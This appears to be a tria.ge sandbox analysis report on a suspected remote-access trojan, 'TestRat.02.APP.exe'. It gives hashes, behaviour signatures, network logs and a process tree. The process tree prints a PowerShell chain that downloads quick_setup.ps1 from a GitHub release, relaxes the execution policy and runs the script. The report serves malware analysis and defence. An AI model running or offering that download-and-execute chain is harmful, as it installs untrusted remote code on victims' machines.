Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

TestRat.02.APP.exe

windows10-2004-x64

1

TestRat.02.APP.exe

windows11-21h2-x64

1

TestRat.02.APP.exe

windows10-2004-x64

10

TestRat.02.APP.exe

windows11-21h2-x64

8

Analysis

  • max time kernel
    146s
  • max time network
    152s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22/07/2024, 17:00 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TestRat.02.APP.exe

  • Size

    139KB

  • MD5

    6d75b31bfa691bdf32c0c9331c8b7ff7

  • SHA1

    5387d89075eb924adca7318add02c0bca8812a9e

  • SHA256

    fb1e3c46ce349e7ae853621f708fe0bfa08e142b6f6262dc9ab6f8e03cb5380f

  • SHA512

    ca08fd9ed2543ff13167f57e27fe4fbb6a395161e25902b7c9ec562034f6cb9aa24f2a32c04341b5ac29c49bd683393856742bd0f400e2c0cc660760ab2b7b83

  • SSDEEP

    3072:CAi4pxpEHmAdx4/kyHRZa0YiRAl278IVn2JbS1cJA8lW7:CAi4pxpRkyHRZa0Gl278IVNc2cW

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

    execution
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\TestRat.02.APP.exe
    "C:\Users\Admin\AppData\Local\Temp\TestRat.02.APP.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Invoke-WebRequest -Uri https://github.com/Daulaires/Daulaires/releases/download/Lester/quick_setup.ps1 -OutFile quick_setup.ps1
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4680
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-ExecutionPolicy RemoteSigned -Scope CurrentUser -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4092
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" .\quick_setup.ps1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1564
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1468

    Network

    • flag-us
      DNS
      github.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      github.com
      IN A
      Response
      github.com
      IN A
      20.26.156.215
    • flag-us
      DNS
      objects.githubusercontent.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      objects.githubusercontent.com
      IN A
      Response
      objects.githubusercontent.com
      IN A
      185.199.109.133
      objects.githubusercontent.com
      IN A
      185.199.110.133
      objects.githubusercontent.com
      IN A
      185.199.111.133
      objects.githubusercontent.com
      IN A
      185.199.108.133
    • flag-us
      DNS
      login.live.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      login.live.com
      IN A
      Response
      login.live.com
      IN CNAME
      login.msa.msidentity.com
      login.msa.msidentity.com
      IN CNAME
      www.tm.lg.prod.aadmsa.trafficmanager.net
      www.tm.lg.prod.aadmsa.trafficmanager.net
      IN CNAME
      prdv4a.aadg.msidentity.com
      prdv4a.aadg.msidentity.com
      IN CNAME
      www.tm.v4.a.prd.aadg.trafficmanager.net
      www.tm.v4.a.prd.aadg.trafficmanager.net
      IN A
      40.126.32.138
      www.tm.v4.a.prd.aadg.trafficmanager.net
      IN A
      40.126.32.133
      www.tm.v4.a.prd.aadg.trafficmanager.net
      IN A
      20.190.160.17
      www.tm.v4.a.prd.aadg.trafficmanager.net
      IN A
      40.126.32.74
      www.tm.v4.a.prd.aadg.trafficmanager.net
      IN A
      20.190.160.22
      www.tm.v4.a.prd.aadg.trafficmanager.net
      IN A
      40.126.32.68
      www.tm.v4.a.prd.aadg.trafficmanager.net
      IN A
      20.190.160.20
      www.tm.v4.a.prd.aadg.trafficmanager.net
      IN A
      40.126.32.136
    • flag-us
      DNS
      ctldl.windowsupdate.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      ctldl.windowsupdate.com
      IN A
      Response
      ctldl.windowsupdate.com
      IN CNAME
      ctldl.windowsupdate.com.delivery.microsoft.com
      ctldl.windowsupdate.com.delivery.microsoft.com
      IN CNAME
      wu-b-net.trafficmanager.net
      wu-b-net.trafficmanager.net
      IN CNAME
      download.windowsupdate.com.edgesuite.net
      download.windowsupdate.com.edgesuite.net
      IN CNAME
      a767.dspw65.akamai.net
      a767.dspw65.akamai.net
      IN A
      2.22.144.73
      a767.dspw65.akamai.net
      IN A
      2.22.144.81
    • flag-us
      DNS
      73.144.22.2.in-addr.arpa
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      73.144.22.2.in-addr.arpa
      IN PTR
      Response
      73.144.22.2.in-addr.arpa
      IN PTR
      a2-22-144-73deploystaticakamaitechnologiescom
    • flag-us
      DNS
      ctldl.windowsupdate.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      ctldl.windowsupdate.com
      IN A
      Response
      ctldl.windowsupdate.com
      IN CNAME
      ctldl.windowsupdate.com.delivery.microsoft.com
      ctldl.windowsupdate.com.delivery.microsoft.com
      IN CNAME
      wu-b-net.trafficmanager.net
      wu-b-net.trafficmanager.net
      IN CNAME
      download.windowsupdate.com.edgesuite.net
      download.windowsupdate.com.edgesuite.net
      IN CNAME
      a767.dspw65.akamai.net
      a767.dspw65.akamai.net
      IN A
      2.22.144.81
      a767.dspw65.akamai.net
      IN A
      2.22.144.73
    • flag-us
      DNS
      self.events.data.microsoft.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      self.events.data.microsoft.com
      IN A
      Response
      self.events.data.microsoft.com
      IN CNAME
      self-events-data.trafficmanager.net
      self-events-data.trafficmanager.net
      IN CNAME
      onedscolprdgwc04.germanywestcentral.cloudapp.azure.com
      onedscolprdgwc04.germanywestcentral.cloudapp.azure.com
      IN A
      51.116.253.169
    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      arc.msn.com
      Remote address:
      8.8.8.8:53
      Request
      arc.msn.com
      IN A
      Response
      arc.msn.com
      IN CNAME
      arc.trafficmanager.net
      arc.trafficmanager.net
      IN CNAME
      iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
      iris-de-prod-azsc-v2-neu.northeurope.cloudapp.azure.com
      IN A
      20.223.35.26
    • flag-us
      DNS
      tse1.mm.bing.net
      Remote address:
      8.8.8.8:53
      Request
      tse1.mm.bing.net
      IN A
      Response
      tse1.mm.bing.net
      IN CNAME
      mm-mm.bing.net.trafficmanager.net
      mm-mm.bing.net.trafficmanager.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
    • flag-us
      DNS
      nexusrules.officeapps.live.com
      Remote address:
      8.8.8.8:53
      Request
      nexusrules.officeapps.live.com
      IN A
      Response
      nexusrules.officeapps.live.com
      IN CNAME
      prod.nexusrules.live.com.akadns.net
      prod.nexusrules.live.com.akadns.net
      IN A
      52.111.229.19
    • flag-us
      DNS
      215.156.26.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      215.156.26.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      138.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      138.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      58.99.105.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      58.99.105.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      19.229.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      19.229.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      133.109.199.185.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.109.199.185.in-addr.arpa
      IN PTR
      Response
      133.109.199.185.in-addr.arpa
      IN PTR
      cdn-185-199-109-133githubcom
    • flag-us
      DNS
      ocsp.digicert.com
      Remote address:
      8.8.8.8:53
      Request
      ocsp.digicert.com
      IN A
      Response
      ocsp.digicert.com
      IN CNAME
      ocsp.edge.digicert.com
      ocsp.edge.digicert.com
      IN CNAME
      fp2e7a.wpc.2be4.phicdn.net
      fp2e7a.wpc.2be4.phicdn.net
      IN CNAME
      fp2e7a.wpc.phicdn.net
      fp2e7a.wpc.phicdn.net
      IN A
      192.229.221.95
    • flag-us
      DNS
      arc.msn.com
      Remote address:
      8.8.8.8:53
      Request
      arc.msn.com
      IN A
      Response
      arc.msn.com
      IN CNAME
      arc.trafficmanager.net
      arc.trafficmanager.net
      IN CNAME
      iris-de-ppe-azsc-v2-neu.northeurope.cloudapp.azure.com
      iris-de-ppe-azsc-v2-neu.northeurope.cloudapp.azure.com
      IN A
      20.105.99.58
    • flag-us
      DNS
      81.144.22.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      81.144.22.2.in-addr.arpa
      IN PTR
      Response
      81.144.22.2.in-addr.arpa
      IN PTR
      a2-22-144-81deploystaticakamaitechnologiescom
    • flag-us
      DNS
      169.253.116.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      169.253.116.51.in-addr.arpa
      IN PTR
      Response
    • 20.26.156.215:443
      github.com
      tls
      powershell.exe
      973 B
       8.2kB
       9
      10
    • 185.199.109.133:443
      objects.githubusercontent.com
      tls
      powershell.exe
      1.4kB
       5.5kB
       7
      8
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls
      1.6kB
       7.2kB
       17
      15
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls
      1.6kB
       7.2kB
       17
      15
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls
      134.2kB
       3.7MB
       2653
      2647
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls
      1.6kB
       7.2kB
       17
      15
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls
      1.6kB
       7.2kB
       17
      15
    • 8.8.8.8:53
      github.com
      dns
      powershell.exe
      475 B
       1.5kB
       7
      7

      DNS Request

      github.com

      DNS Response

      20.26.156.215

      DNS Request

      objects.githubusercontent.com

      DNS Response

      185.199.109.133
      185.199.110.133
      185.199.111.133
      185.199.108.133

      DNS Request

      login.live.com

      DNS Response

      40.126.32.138
      40.126.32.133
      20.190.160.17
      40.126.32.74
      20.190.160.22
      40.126.32.68
      20.190.160.20
      40.126.32.136

      DNS Request

      ctldl.windowsupdate.com

      DNS Response

      2.22.144.73
      2.22.144.81

      DNS Request

      73.144.22.2.in-addr.arpa

      DNS Request

      ctldl.windowsupdate.com

      DNS Response

      2.22.144.81
      2.22.144.73

      DNS Request

      self.events.data.microsoft.com

      DNS Response

      51.116.253.169

    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      261 B
       576 B
       4
      4

      DNS Request

      8.8.8.8.in-addr.arpa

      DNS Request

      arc.msn.com

      DNS Response

      20.223.35.26

      DNS Request

      tse1.mm.bing.net

      DNS Response

      150.171.27.10
      150.171.28.10

      DNS Request

      nexusrules.officeapps.live.com

      DNS Response

      52.111.229.19

    • 8.8.8.8:53
      215.156.26.20.in-addr.arpa
      dns
      287 B
       631 B
       4
      4

      DNS Request

      215.156.26.20.in-addr.arpa

      DNS Request

      138.32.126.40.in-addr.arpa

      DNS Request

      58.99.105.20.in-addr.arpa

      DNS Request

      19.229.111.52.in-addr.arpa

    • 8.8.8.8:53
      133.109.199.185.in-addr.arpa
      dns
      337 B
       752 B
       5
      5

      DNS Request

      133.109.199.185.in-addr.arpa

      DNS Request

      ocsp.digicert.com

      DNS Response

      192.229.221.95

      DNS Request

      arc.msn.com

      DNS Response

      20.105.99.58

      DNS Request

      81.144.22.2.in-addr.arpa

      DNS Request

      169.253.116.51.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      4ef3b165311abe48029443c0a529747f

      SHA1

      ad65cc913ed3805d813bc16337c7f6d2a97b55d9

      SHA256

      c2c563dddc3df7fda0e246d9988718b315a9704335312d5ddfb1768efa1655ff

      SHA512

      696e3deb942e4f6d3980a831668bfd40a8bee586cca3e4ca5a85aeae482af5c8c5ae21e319b4483345c582b7a61d51220c8ccce0072497a8ee53e1e87ac5e99a

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      e3840d9bcedfe7017e49ee5d05bd1c46

      SHA1

      272620fb2605bd196df471d62db4b2d280a363c6

      SHA256

      3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

      SHA512

      76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      b94a5f9c019b614942fc29d049e77006

      SHA1

      7d22a700e14c52c6ded2a26cc063057b779d5c2e

      SHA256

      ac01c39f1027c82f8d739b7a15c8fc17875bf33f3069f9acf0eb4a0d3b8803d7

      SHA512

      301825dd58920d02a28650c9bd9a43d36d5d896fa72b79b49792a868f2df4d419dd6fdfe245f544f8becaff9585e63050fe2e6979dbc35a592017423a392633e

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1wdrrbu4.3aj.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/1564-27-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1564-18-0x000001F777E80000-0x000001F777EA2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1564-29-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1564-40-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1564-36-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4092-34-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4092-35-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4092-30-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4092-28-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4680-31-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4680-0-0x00007FFC8BA83000-0x00007FFC8BA85000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4680-9-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4680-44-0x00000228BAF80000-0x00000228BB08A000-memory.dmp

      Filesize

      1.0MB

      Download

    • memory/4680-45-0x00007FFC8BA80000-0x00007FFC8C542000-memory.dmp

      Filesize

      10.8MB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.